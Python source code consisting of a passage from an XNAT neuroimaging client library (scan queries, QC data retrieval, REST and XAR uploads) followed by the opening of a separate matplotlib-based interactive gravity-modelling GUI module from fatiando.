Extracting a Java 1.6 XNAT ZIP archive in Python.
:param zf: ZipFile object
:type zf: zipfile.ZipFile
:param out_dir: Output directory
:type out_dir: str
'''
previous_header_offset = 0
compensation = Namespace(value=2**32, factor=0)
for i,member in enumerate(zf.infolist()):
'''
Right... so when Java 1.6 produces a Zip filesystem that exceeds 2^32
bytes, the Central Directory local file header offsets after the 2^32
byte appear to overflow. The Python zipfile module then adds any
unexpected bytes to each header offset thereafter. This attempts to fix
that. My guess is that this comment might make perfect sense now, but
will make aboslutely no sense in about a year.
'''
# undo concat padding added from zipfile.py:819
if i == 0:
concat = member.header_offset
member.header_offset -= concat
# if a header offset moves backward, add 2^32 bytes * factor
if previous_header_offset > member.header_offset:
compensation.factor += 1
previous_header_offset = member.header_offset
member.header_offset += compensation.value * compensation.factor
# read the archive member into a bytes file-like object
try:
bio = io.BytesIO(zf.read(member.filename))
except zipfile.BadZipfile:
with tf.NamedTemporaryFile(dir=out_dir, prefix="xnat",
suffix=".zip", delete=False) as fo:
content.seek(0)
fo.write(content.read())
fo.flush()
os.fsync(fo.fileno())
raise DownloadError("bad zip file, written to %s" % fo.name)
# xnat archives may contain files that are gzipped without the .gz
if not member.filename.endswith(".gz"):
try:
gz = gzip.GzipFile(fileobj=bio, mode="rb")
gz.read()
bio = gz
except IOError:
pass
# write the file out to the filesystem
bio.seek(0)
f = os.path.join(out_dir, os.path.basename(member.filename))
commons.atomic_write(f, bio.read(), encoding=False)
def __quick_validate(r, check=('ResultSet', 'Result', 'totalRecords')):
'''
Quick validation of JSON result set returned by XNAT.
:param r: Result set data in JSON format
:type r: dict
:param check: Fields to check
:type check: tuple
:returns: Result set is valid
:rtype: bool
'''
if 'ResultSet' in check and 'ResultSet' not in r:
raise ResultSetError('no ResultSet in server response')
if 'Result' in check and 'Result' not in r['ResultSet']:
raise ResultSetError('no Result in server response')
if 'totalRecords' in check and 'totalRecords' not in r['ResultSet']:
raise ResultSetError('no totalRecords in server response')
return True
def scansearch(auth, label, filt, project=None, aid=None):
'''
Search for scans by supplying a set of SQL-based conditionals.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> query = {
... 'eor1': "note LIKE %EOR1%",
... 'eor2': "note LIKE %EOR2%",
... 'mpr': "series_description='T1_MEMPRAGE RMS' OR note LIKE %ANAT%"
... }
>>> yaxil.scansearch(auth, 'AB1234C', query)
{"mpr": [4], "eor1": [13], "eor2": [14]}
:param auth: XNAT authentication object
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT MR Session label
:type label: str
:param filt: Scan search filter/query
:type filt: dict
:param project: XNAT MR Session project
:type project: str
:param aid: XNAT Accession ID
:type aid: str
:returns: Same dictionary that was passed in, but values are now matching scans
:rtype: dict
'''
if not aid:
aid = accession(auth, label, project)
# get scans for accession as a csv
url = "%s/data/experiments/%s/scans?format=csv" % (auth.url.rstrip('/'), aid)
logger.debug("issuing http request %s", url)
r = requests.get(url, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
if r.status_code != requests.codes.ok:
raise ScanSearchError("response not ok (%s) from %s" % (r.status_code, r.url))
if not r.content:
raise ScanSearchError("response is empty from %s" % r.url)
# read the result into a csv reader
reader = csv.reader(io.StringIO(r.content.decode()))
columns = next(reader)
# create an in-memory database
conn = sqlite3.connect(":memory:")
c = conn.cursor()
# create scans table and insert data
c.execute("CREATE TABLE scans (%s)" % ','.join(columns))
query = "INSERT INTO scans VALUES (%s)" % ','.join('?' * len(columns))
for row in reader:
c.execute(query, [x for x in row])
conn.commit()
# run the user supplied filters and return result
result = col.defaultdict(list)
for token,filt in iter(filt.items()):
try:
result[token] = [x[0] for x in c.execute("SELECT ID FROM scans where %s" % filt)]
except sqlite3.OperationalError:
logger.critical("something is wrong with the filter: %s", filt)
raise
return result
def mrscans(auth, label=None, scan_ids=None, project=None, experiment=None):
'''
Get scan information for a MR Session as a sequence of dictionaries.
Example:
>>> import yaxil
>>> import json
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> for scan in yaxil.scans2(auth, 'AB1234C'):
... print(json.dumps(scan, indent=2))
:param auth: XNAT authentication object
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT MR Session label
:type label: str
:param scan_ids: Scan numbers to return
:type scan_ids: list
:param project: XNAT MR Session project
:type project: str
:param experiment: YAXIL Experiment
:type experiment: :mod:`yaxil.Experiment`
:returns: Generator of scan data dictionaries
:rtype: dict
'''
if experiment and (label or project):
raise ValueError('cannot supply experiment with label or project')
if experiment:
label,project = experiment.label,experiment.project
aid = accession(auth, label, project)
path = f'/data/experiments/{aid}/scans'
params = {
'columns': ','.join(mrscans.columns.keys())
}
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
if not result['xnat:mrscandata/id']:
continue
if scan_ids == None or result['xnat:mrscandata/id'] in scan_ids:
data = dict()
for k,v in iter(mrscans.columns.items()):
data[v] = result[k]
yield data
mrscans.columns = {
"ID": "ID",
"insert_date": "date_archived",
"insert_user": "archiver",
"xnat:mrsessiondata/operator": "operator",
"xnat:mrscandata/id": "id",
"xnat:mrscandata/quality": "quality",
"xnat:mrscandata/series_description": "series_description",
"xnat:mrscandata/scanner": "scanner",
"xnat:mrscandata/scanner/manufacturer": "scanner_manufacturer",
"xnat:mrscandata/scanner/model": "scanner_model",
"xnat:mrscandata/frames": "frames",
"xnat:mrscandata/note": "note",
"xnat:mrscandata/type": "type",
"xnat:mrscandata/parameters/voxelres/x": "vox_x",
"xnat:mrscandata/parameters/voxelres/y": "vox_y",
"xnat:mrscandata/parameters/voxelres/z": "vox_z",
"xnat:mrscandata/parameters/fov/x": "fov_x",
"xnat:mrscandata/parameters/fov/y": "fov_y",
"xnat:mrscandata/parameters/tr": "tr",
"xnat:mrscandata/parameters/te": "te",
"xnat:mrscandata/parameters/flip": "flip",
"xnat:mrscandata/parameters/sequence": "sequence",
"xnat:mrscandata/parameters/imagetype": "image_type",
"xnat:mrscandata/parameters/scansequence": "scan_sequence",
"xnat:mrscandata/parameters/seqvariant": "sequence_variant",
"xnat:mrscandata/parameters/acqtype": "acquisition_type",
"xnat:mrscandata/parameters/pixelbandwidth": "pix_bandwidth"
}
def srscans(auth, label=None, scan_ids=None, project=None, experiment=None):
if experiment and (label or project):
raise ValueError('cannot supply experiment with label or project')
if experiment:
label,project = experiment.label,experiment.project
aid = accession(auth, label, project)
path = f'/data/experiments/{aid}/scans'
params = {
'columns': ','.join(srscans.columns.keys())
}
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
if not result['xnat:srscandata/id']:
continue
if scan_ids == None or result['xnat:srscandata/id'] in scan_ids:
data = dict()
for k,v in iter(srscans.columns.items()):
data[v] = result[k]
yield data
srscans.columns = {
"ID": "ID",
"insert_date": "date_archived",
"insert_user": "archiver",
"xnat:imagesessiondata/operator": "operator",
"xnat:srscandata/id": "id",
"xnat:srscandata/quality": "quality",
"xnat:srscandata/note": "note",
"xnat:srscandata/type": "type",
"xnat:srscandata/series_description": "series_description",
"xnat:srscandata/scanner": "scanner",
"xnat:srscandata/scanner/manufacturer": "scanner_manufacturer",
"xnat:srscandata/scanner/model": "scanner_model"
}
def scscans(auth, label=None, scan_ids=None, project=None, experiment=None):
if experiment and (label or project):
raise ValueError('cannot supply experiment with label or project')
if experiment:
label,project = experiment.label,experiment.project
aid = accession(auth, label, project)
path = f'/data/experiments/{aid}/scans'
params = {
'xsiType': 'xnat:mrSessionData',
'xnat:mrSessionData/ID': aid,
'columns': ','.join(scscans.columns.keys())
}
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
if not result['xnat:scscandata/id']:
continue
if scan_ids == None or result['xnat:scscandata/id'] in scan_ids:
data = dict()
for k,v in iter(scscans.columns.items()):
data[v] = result[k]
yield data
scscans.columns = {
"ID": "ID",
"insert_date": "date_archived",
"insert_user": "archiver",
"xnat:imagesessiondata/operator": "operator",
"xnat:scscandata/id": "id",
"xnat:scscandata/quality": "quality",
"xnat:scscandata/note": "note",
"xnat:scscandata/type": "type",
"xnat:scscandata/series_description": "series_description",
"xnat:scscandata/scanner": "scanner",
"xnat:scscandata/scanner/manufacturer": "scanner_manufacturer",
"xnat:scscandata/scanner/model": "scanner_model"
}
def odscans(auth, label=None, scan_ids=None, project=None, experiment=None):
if experiment and (label or project):
raise ValueError('cannot supply experiment with label or project')
if experiment:
label,project = experiment.label,experiment.project
aid = accession(auth, label, project)
path = f'/data/experiments/{aid}/scans'
params = {
'columns': ','.join(odscans.columns.keys())
}
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
if not result['xnat:otherdicomscandata/id']:
continue
if scan_ids == None or result['xnat:otherdicomscandata/id'] in scan_ids:
data = dict()
for k,v in iter(odscans.columns.items()):
data[v] = result[k]
yield data
odscans.columns = {
"ID": "ID",
"insert_date": "date_archived",
"insert_user": "archiver",
"xnat:imagesessiondata/operator": "operator",
"xnat:otherdicomscandata/id": "id",
"xnat:otherdicomscandata/quality": "quality",
"xnat:otherdicomscandata/note": "note",
"xnat:otherdicomscandata/type": "type",
"xnat:otherdicomscandata/series_description": "series_description",
"xnat:otherdicomscandata/scanner": "scanner",
"xnat:otherdicomscandata/scanner/manufacturer": "scanner_manufacturer",
"xnat:otherdicomscandata/scanner/model": "scanner_model",
}
def scans(auth, label=None, scan_ids=None, project=None, experiment=None):
if experiment and (label or project):
raise ValueError('cannot supply experiment with label or project')
if experiment:
label,project = experiment.label,experiment.project
aid = accession(auth, label, project)
'''
Getting experiment details like this may not be necessary if the following
issue is fixed https://issues.xnat.org/browse/XNAT-6829
'''
experiment_details = __experiment_details(auth, aid)
'''
An MR Session can have a mixed scan types (xsi:type) that must be
requested separately
'''
xsitypes = __get_xsi_types(auth, aid)
'''
Call the appropriate handler for each scan type
'''
for xsitype in xsitypes:
if xsitype not in scans.handlers:
logger.warning('could not find a handler for %s', xsitype)
continue
for scan in scans.handlers[xsitype](auth, label, scan_ids, project):
scan.update(experiment_details)
yield scan
scans.handlers = {
'xnat:mrScanData': mrscans,
'xnat:srScanData': srscans,
'xnat:scScanData': scscans,
'xnat:otherDicomScanData': odscans
}
def __get_xsi_types(auth, aid):
path = f'/data/experiments/{aid}/scans'
params = {
'columns': 'xsiType'
}
_,result = _get(auth, path, 'json', autobox=True)
xsitypes = set()
for result in result['ResultSet']['Result']:
xsitypes.add(result['xsiType'])
return xsitypes
def __experiment_details(auth, aid):
path = f'/data/experiments'
columns = [
'URI',
'xsiType',
'ID',
'label',
'project',
'subject_ID',
'subject_label',
'subject_project',
'date',
'time',
'fieldStrength'
]
params = {
'ID': aid,
'columns': ','.join(columns)
}
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
return {
'session_uri': result['URI'],
'xsitype': result['xsiType'],
'session_id': result['ID'],
'session_label': result['label'],
'session_project': result['project'],
'date_scanned': result['date'],
'time_scanned': result['time'],
'subject_id': result['subject_ID'],
'subject_label': result['subject_label'],
'subject_project': result['subject_project'],
'field_strength': result['fieldStrength']
}
def extendedboldqc(auth, label, scan_ids=None, project=None, aid=None):
'''
Get ExtendedBOLDQC data as a sequence of dictionaries.
Example:
>>> import yaxil
>>> import json
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> for eqc in yaxil.extendedboldqc2(auth, 'AB1234C')
... print(json.dumps(eqc, indent=2))
:param auth: XNAT authentication object
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT MR Session label
:type label: str
:param scan_ids: Scan numbers to return
:type scan_ids: list
:param project: XNAT MR Session project
:type project: str
:param aid: XNAT Accession ID
:type aid: str
:returns: Generator of scan data dictionaries
:rtype: :mod:`dict`
'''
if not aid:
aid = accession(auth, label, project)
path = '/data/experiments'
params = {
'xsiType': 'neuroinfo:extendedboldqc',
'columns': ','.join(extendedboldqc.columns.keys())
}
if project:
params['project'] = project
params['xnat:mrSessionData/ID'] = aid
_,result = _get(auth, path, 'json', autobox=True, params=params)
for result in result['ResultSet']['Result']:
if scan_ids == None or result['neuroinfo:extendedboldqc/scan/scan_id'] in scan_ids:
data = dict()
for k,v in iter(extendedboldqc.columns.items()):
data[v] = result[k]
yield data
extendedboldqc.columns = {
"xnat:mrsessiondata/id": "session_id",
"xnat:mrsessiondata/label": "session_label",
"xnat:mrsessiondata/project": "project",
"subject_label": "subject_label",
"xnat:subjectdata/id": "subject_id",
"neuroinfo:extendedboldqc/id": "id",
"neuroinfo:extendedboldqc/scan/scan_id": "scan_id",
"neuroinfo:extendedboldqc/pipeline/status": "status",
"neuroinfo:extendedboldqc/scan/n_vols": "nvols",
"neuroinfo:extendedboldqc/scan/skip": "skip",
"neuroinfo:extendedboldqc/scan/qc_thresh": "mask_threshold",
"neuroinfo:extendedboldqc/scan/qc_nvox": "nvoxels",
"neuroinfo:extendedboldqc/scan/qc_mean": "mean",
"neuroinfo:extendedboldqc/scan/qc_max": "max",
"neuroinfo:extendedboldqc/scan/qc_min": "min",
"neuroinfo:extendedboldqc/scan/qc_stdev": "stdev",
"neuroinfo:extendedboldqc/scan/qc_ssnr": "ssnr",
"neuroinfo:extendedboldqc/scan/qc_vsnr": "vsnr",
"neuroinfo:extendedboldqc/scan/qc_slope": "slope",
"neuroinfo:extendedboldqc/scan/mot_n_tps": "mot_n_tps",
"neuroinfo:extendedboldqc/scan/mot_rel_x_sd": "mot_rel_x_sd",
"neuroinfo:extendedboldqc/scan/mot_rel_x_max": "mot_rel_x_max",
"neuroinfo:extendedboldqc/scan/mot_rel_x_1mm": "mot_rel_x_1mm",
"neuroinfo:extendedboldqc/scan/mot_rel_x_5mm": "mot_rel_x_5mm",
"neuroinfo:extendedboldqc/scan/mot_rel_y_mean": "mot_rel_y_mean",
"neuroinfo:extendedboldqc/scan/mot_rel_y_sd": "mot_rel_y_sd",
"neuroinfo:extendedboldqc/scan/mot_rel_y_max": "mot_rel_y_max",
"neuroinfo:extendedboldqc/scan/mot_rel_y_1mm": "mot_rel_y_1mm",
"neuroinfo:extendedboldqc/scan/mot_rel_y_5mm": "mot_rel_y_5mm",
"neuroinfo:extendedboldqc/scan/mot_rel_z_mean": "mot_rel_z_mean",
"neuroinfo:extendedboldqc/scan/mot_rel_z_sd": "mot_rel_z_sd",
"neuroinfo:extendedboldqc/scan/mot_rel_z_max": "mot_rel_z_max",
"neuroinfo:extendedboldqc/scan/mot_rel_z_1mm": "mot_rel_z_1mm",
"neuroinfo:extendedboldqc/scan/mot_rel_z_5mm": "mot_rel_z_5mm",
"neuroinfo:extendedboldqc/scan/mot_rel_xyz_mean": "mot_rel_xyz_mean",
"neuroinfo:extendedboldqc/scan/mot_rel_xyz_sd": "mot_rel_xyz_sd",
"neuroinfo:extendedboldqc/scan/mot_rel_xyz_max": "mot_rel_xyz_max",
"neuroinfo:extendedboldqc/scan/mot_rel_xyz_1mm": "mot_rel_xyz_1mm",
"neuroinfo:extendedboldqc/scan/mot_rel_xyz_5mm": "mot_rel_xyz_5mm",
"neuroinfo:extendedboldqc/scan/rot_rel_x_mean": "rot_rel_x_mean",
"neuroinfo:extendedboldqc/scan/rot_rel_x_sd": "rot_rel_x_sd",
"neuroinfo:extendedboldqc/scan/rot_rel_x_max": "rot_rel_x_max",
"neuroinfo:extendedboldqc/scan/rot_rel_y_mean": "rot_rel_y_mean",
"neuroinfo:extendedboldqc/scan/rot_rel_y_sd": "rot_rel_y_sd",
"neuroinfo:extendedboldqc/scan/rot_rel_y_max": "rot_rel_y_max",
"neuroinfo:extendedboldqc/scan/rot_rel_z_mean": "rot_rel_z_mean",
"neuroinfo:extendedboldqc/scan/rot_rel_z_sd": "rot_rel_z_sd",
"neuroinfo:extendedboldqc/scan/rot_rel_z_max": "rot_rel_z_max",
"neuroinfo:extendedboldqc/scan/mot_abs_x_mean": "mot_abs_x_mean",
"neuroinfo:extendedboldqc/scan/mot_abs_x_sd": "mot_abs_x_sd",
"neuroinfo:extendedboldqc/scan/mot_abs_x_max": "mot_abs_x_max",
"neuroinfo:extendedboldqc/scan/mot_abs_y_mean": "mot_abs_y_mean",
"neuroinfo:extendedboldqc/scan/mot_abs_y_sd": "mot_abs_y_sd",
"neuroinfo:extendedboldqc/scan/mot_abs_y_max": "mot_abs_y_max",
"neuroinfo:extendedboldqc/scan/mot_abs_z_mean": "mot_abs_z_mean",
"neuroinfo:extendedboldqc/scan/mot_abs_z_sd": "mot_abs_z_sd",
"neuroinfo:extendedboldqc/scan/mot_abs_z_max": "mot_abs_z_max",
"neuroinfo:extendedboldqc/scan/mot_abs_xyz_mean": "mot_abs_xyz_mean",
"neuroinfo:extendedboldqc/scan/mot_abs_xyz_sd": "mot_abs_xyz_sd",
"neuroinfo:extendedboldqc/scan/mot_abs_xyz_max": "mot_abs_xyz_max",
"neuroinfo:extendedboldqc/scan/rot_abs_x_mean": "rot_abs_x_mean",
"neuroinfo:extendedboldqc/scan/rot_abs_x_sd": "rot_abs_x_sd",
"neuroinfo:extendedboldqc/scan/rot_abs_x_max": "rot_abs_x_max",
"neuroinfo:extendedboldqc/scan/rot_abs_y_mean": "rot_abs_y_mean",
"neuroinfo:extendedboldqc/scan/rot_abs_y_sd": "rot_abs_y_sd",
"neuroinfo:extendedboldqc/scan/rot_abs_y_max": "rot_abs_y_max",
"neuroinfo:extendedboldqc/scan/rot_abs_z_mean": "rot_abs_z_mean",
"neuroinfo:extendedboldqc/scan/rot_abs_z_sd": "rot_abs_z_sd",
"neuroinfo:extendedboldqc/scan/rot_abs_z_max": "rot_abs_z_max"
}
def _get(auth, path, fmt, autobox=True, params=None):
'''
Issue a GET request to the XNAT REST API and box the response content.
Example:
>>> import yaxil
>>> from yaxil import Format
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.get(auth, '/data/experiments', Format.JSON)
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param path: API URL path
:type path: str
:param fmt: API result format
:type fmt: :mod:`yaxil.Format`
:param autobox: Autobox response content into an appropriate reader or other data structure
:type autobox: bool
:param params: Additional query parameters
:type params: dict
:returns: Tuple of (URL, :mod:`dict` | :mod:`xml.etree.ElementTree` | :mod:`csv.reader` | :mod:`str`)
:rtype: tuple
'''
if not params:
params = {}
url = "%s/%s" % (auth.url.rstrip('/'), path.lstrip('/'))
params["format"] = fmt
logger.debug("issuing http request %s", url)
logger.debug("query parameters %s", params)
r = requests.get(url, params=params, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
if r.status_code != requests.codes.ok:
raise RestApiError("response not ok (%s) from %s" % (r.status_code, r.url))
if not r.content:
raise RestApiError("response is empty from %s" % r.url)
if autobox:
return r.url,_autobox(r.text, fmt)
else:
return r.url,r.content
def _autobox(content, format):
'''
Autobox response content.
:param content: Response content
:type content: str
:param format: Format to return
:type format: `yaxil.Format`
:returns: Autoboxed content
:rtype: dict|xml.etree.ElementTree.Element|csvreader
'''
if format == Format.JSON:
return json.loads(content)
elif format == Format.XML:
return etree.fromstring(content)
elif format == Format.CSV:
try:
return csv.reader(io.BytesIO(content))
except TypeError:
# as per https://docs.python.org/2/library/csv.html#examples
def unicode_csv_reader(unicode_csv_data, dialect=csv.excel, **kwargs):
# csv.py doesn't do Unicode; encode temporarily as UTF-8:
csv_reader = csv.reader(utf_8_encoder(unicode_csv_data),
dialect=dialect, **kwargs)
for row in csv_reader:
# decode UTF-8 back to Unicode, cell by cell:
yield [unicode(cell, 'utf-8') for cell in row]
def utf_8_encoder(unicode_csv_data):
for line in unicode_csv_data:
yield line.encode('utf-8')
return unicode_csv_reader(io.StringIO(content))
else:
raise AutoboxError("unknown autobox format %s" % format)
def exists(auth, xnatid, datatype='experiments'):
'''
Test if an object exists
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param xnatid: XNAT object ID
:param xnatid: str
:param datatype: XNAT data type
:type datatype: str
:returns: True or False
:rtype: bool
'''
url = '{0}/data/{1}/{2}'.format(auth.url.rstrip('/'), datatype, xnatid)
logger.debug('issuing http request %s', url)
r = requests.get(
url,
auth=basicauth(auth),
verify=CHECK_CERTIFICATE
)
if r.status_code == requests.codes.ok:
return True
return False
def has(auth, xsitype, project=None):
'''
Test if a project contains any items of a particular xsi:type.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.has(auth, 'neuroinfo:extendedboldqc', project='MyProject')
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param xsitype: XNAT xsi:type
:param xsitype: str
:param project: XNAT Project
:type project: str
:returns: True or False
:rtype: bool
'''
path = "/data/experiments"
params = {
"xsiType": xsitype,
"columns": 'ID'
}
if project:
params["project"] = project
url,result = _get(auth, path, Format.JSON, autobox=True, params=params)
try:
__quick_validate(result)
except ResultSetError as e:
raise ResultSetError("%s in response from %s" % (e.message, url))
if int(result["ResultSet"]["totalRecords"]) == 0:
return False
return True
def storexar_cli(auth, archive):
'''
StoreXAR through command line utility
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param path: Filesystem location of ZIP (XAR) archive
:type path: str
'''
StoreXAR = commons.which('StoreXAR')
if not StoreXAR:
raise CommandNotFoundError('StoreXAR not found')
archive = os.path.abspath(archive)
popd = os.getcwd()
os.chdir(os.path.dirname(StoreXAR))
cmd = [
'sh',
'StoreXAR',
'-host', auth.url,
'-u', auth.username,
'-p', auth.password,
'-f', archive
]
try:
logger.debug(cmd)
output = sp.check_output(cmd, stderr=sp.PIPE).decode()
if 'Upload Completed' in output:
logger.info('XAR upload complete')
except sp.CalledProcessError as e:
logger.error(e.stdout)
logger.error(e.stderr)
raise e
os.chdir(popd)
def storerest(auth, artifacts_dir, resource_name):
'''
Store data into XNAT over REST API
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param artifacts_dir: Filesystem location of assessor artifacts
:type artifacts_dir: str
:param resource_name: Resource name
:type resource_name: str
'''
assessment = os.path.join(artifacts_dir, 'assessor', 'assessment.xml')
resources = os.path.join(artifacts_dir, 'resources')
# parseassessor and session ID from assessment.xml
with open(assessment) as fo:
root = etree.parse(fo)
aid = root.find('.').attrib['ID']
sid = root.findall('.//{http://nrg.wustl.edu/xnat}imageSession_ID').pop().text
logger.debug(f'assessor id={aid}')
logger.debug(f'session id={sid}')
baseurl = auth.url.rstrip('/')
# create (post) new image assessor
url = f'{baseurl}/data/experiments/{sid}/assessors'
logger.debug(f'posting {assessment} to {url}')
r = requests.post(
url,
auth=(auth.username, auth.password),
files={
'file': open(assessment, 'rb')
},
allow_redirects=True
)
if r.status_code == requests.codes.ok:
logger.debug(f'assessment {aid} uploaded successfully')
elif r.status_code == requests.codes.conflict:
logger.debug(f'assessment {aid} likely already exists')
return
else:
raise StoreRESTError(f'assessment {assessment} failed to upload ({r.status_code})')
# create (put) new image assessor resource folder
url = f'{baseurl}/data/experiments/{sid}/assessors/{aid}/resources/{resource_name}'
logger.debug('PUT %s', url)
r = requests.put(
url,
auth=(auth.username, auth.password),
allow_redirects=True
)
if r.status_code == requests.codes.ok:
logger.debug(f'resource folder created {resource_name}')
elif r.status_code == requests.codes.conflict:
logger.debug(f'resource folder {resource_name} likely already exists')
else:
raise StoreRESTError(f'could not create resource folder {resource_name} ({r.status_code})')
# upload (put) image assessor resource files
for resource in os.listdir(resources):
resource_dir = os.path.join(resources, resource)
for f in os.listdir(resource_dir):
fullfile = os.path.join(resource_dir, f)
url = f'{baseurl}/data/experiments/{sid}/assessors/{aid}/resources/{resource_name}/files/{resource}/{f}'
logger.debug('PUT %s', url)
r = requests.put(
url,
auth=(auth.username, auth.password),
files={
'file': open(fullfile, 'rb')
},
allow_redirects=True
)
if r.status_code == requests.codes.ok:
logger.debug(f'file {fullfile} was stored successfully as {resource}')
elif r.status_code == requests.codes.conflict:
logger.debug(f'resource {resource} likely already exists')
else:
raise StoreRESTError(f'could not store resource file {fullfile} ({r.status_code})')
class StoreRESTError(Exception):
pass
def storexar(auth, archive, verify=True):
'''
StoreXAR implementation
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param path: Filesystem location of ZIP (XAR) archive
:type path: str
'''
# soap envelope
envelope = '''<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<execute soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" />
</soapenv:Body>
</soapenv:Envelope>'''
with requests.Session() as s:
# determine whether URL will be redirected
redir_url = requests.head(auth.url, allow_redirects=True, verify=verify).url
# create axis session
logger.debug('creating soap service session')
url = redir_url.rstrip('/') + '/axis/CreateServiceSession.jws'
r = s.post(
url,
data=envelope,
headers={
'User-Agent': 'Axis/1.3',
'SOAPAction': '""'
},
auth=basicauth(auth),
verify=verify
)
if r.history:
for i,resp in enumerate(r.history):
logger.debug('SOAP service redirect #%i: %s to %s', i, resp.status_code, resp.url)
logger.debug('SOAP service session url: %s', r.url)
logger.debug('SOAP service session status: %s', r.status_code)
logger.debug('SOAP service session body: %s', r.text)
logger.debug('SOAP service session headers: \n%s', r.headers)
logger.debug('Session cookies: \n%s', requests.utils.dict_from_cookiejar(s.cookies))
if r.status_code != requests.codes.ok:
raise StoreXARError('response not ok (%s) from %s' % (r.status_code, r.url))
# post the xar archive
logger.debug('posting xar archive')
url = redir_url.rstrip('/') + '/app/template/StoreXAR.vm'
r = s.post(
url,
verify=verify,
files={
'archive': (archive, open(archive, 'rb'), 'application/octet-stream', {})
}
)
if r.history:
for i,resp in enumerate(r.history):
logger.debug('XAR archive upload redirect #%i: %s to %s', i, resp.status_code, resp.url)
logger.debug('XAR archive upload url: %s', r.url)
logger.debug('XAR archive upload status: %s', r.status_code)
logger.debug('XAR archive upload body: %s', r.text)
logger.debug('XAR archive upload headers: \n%s', r.headers)
if r.status_code != requests.codes.ok:
raise StoreXARError('response not ok (%s) from %s' % (r.status_code, r.url))
# check for success string in response content
if not 'Upload Complete' in r.text:
raise StoreXARError('response text from %s is\n%s' % (r.url, r.text))
logger.debug('upload complete')
class StoreXARError(Exception):
pass
|
<filename>fatiando/gui/simple.py
"""
Simple GUIs using the interactive capabilities of :mod:`matplotlib`
**Interactive gravimetric modeling**
* :class:`~fatiando.gui.simple.Moulder`
* :class:`~fatiando.gui.simple.BasinTrap`
* :class:`~fatiando.gui.simple.BasinTri`
**Interactive modeling of layered media**
* :class:`~fatiando.gui.simple.Lasagne`
----
"""
import bisect
import numpy
from matplotlib import pyplot, widgets
from .. import utils
from ..gravmag import talwani
from ..mesher import Polygon
from ..seismic import profile
class Moulder():
"""
Interactive potential field direct modeling in 2D using polygons.
Uses module :mod:`~fatiando.gravmag.talwani` for computations.
For the moment only works for the gravity anomaly.
To run this in a script, use::
# Define the area of modeling
area = (0, 1000, 0, 1000)
# Where the gravity effect is calculated
xp = range(0, 1000, 10)
zp = [0]*len(xp)
# Create the application
app = Moulder(area, xp, zp)
# Run it (close the window to finish)
app.run()
# and save the calculated gravity anomaly profile
app.savedata("mydata.txt")
Parameters:
* area : list = [xmin, xmax, zmin, zmax]
Are of the subsuface to use for modeling. Remember, z is positive
downward
* xp, zp : array
Arrays with the x and z coordinates of the computation points
* gz : array
The observed gravity values at the computation points.
Will be plotted as black points together with the modeled (predicted)
data. If None, will ignore this.
"The truth is out there"
"""
instructions = '-'.join(["Click to start drawing",
"Choose density using the slider",
"Right click to close polygon",
"'e' to delete"])
name = "Moulder - Direct gravimetric modeling"
def __init__(self, area, xp, zp, gz=None):
if len(zp) != len(xp):
raise ValueError("xp and zp must have same size")
# Get the data
self.area = area
self.x1, self.x2, z1, z2 = 0.001 * numpy.array(area)
if gz is not None:
if len(gz) != len(xp):
raise ValueError("xp, zp and gz must have same size")
self.gz = numpy.array(gz)
else:
self.gz = gz
self.xp = numpy.array(xp, dtype='f')
self.zp = numpy.array(zp, dtype='f')
# Make the figure
self.fig = pyplot.figure(figsize=(12, 8))
self.fig.canvas.set_window_title(self.name)
self.fig.suptitle(self.instructions)
self.draw = self.fig.canvas.draw
# Make the data and model canvas
self.dcanvas = self.fig.add_subplot(2, 1, 1)
self.dcanvas.set_ylabel("mGal")
self.dcanvas.set_xlim(self.x1, self.x2)
self.dcanvas.grid()
self.mcanvas = self.fig.add_subplot(2, 1, 2)
self.mcanvas.set_ylabel("Depth (km)")
self.mcanvas.set_xlabel("x (km)")
self.mcanvas.set_xlim(self.x1, self.x2)
self.mcanvas.set_ylim(z2, z1)
self.mcanvas.grid()
self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.18,
hspace=0.1)
# Make the sliders
sliderax = self.fig.add_axes([0.20, 0.08, 0.60, 0.03])
self.densslider = widgets.Slider(sliderax, 'Density',
-9, 9, valinit=0.,
valfmt='%1.2f (g/cm3)')
sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])
self.errslider = widgets.Slider(sliderax, 'Error',
0, 5, valinit=0.,
valfmt='%1.2f (mGal)')
# Initialize the data
self.leg = None
self.predgz = None
self.predplot, = self.dcanvas.plot([], [], '-r', linewidth=2)
if self.gz is not None:
self.gzplot, = self.dcanvas.plot(xp * 0.001, gz, 'ok')
self.nextdens = 1000.
self.densslider.set_val(self.nextdens * 0.001)
self.error = 0.
self.densities = []
self.polygons = []
self.nextpoly = []
self.plotx = []
self.ploty = []
self.polyplots = []
self.polyline, = self.mcanvas.plot([], [], marker='o', linewidth=2)
def run(self):
# Connect the event handlers
self.picking = False
self.connect()
self.update()
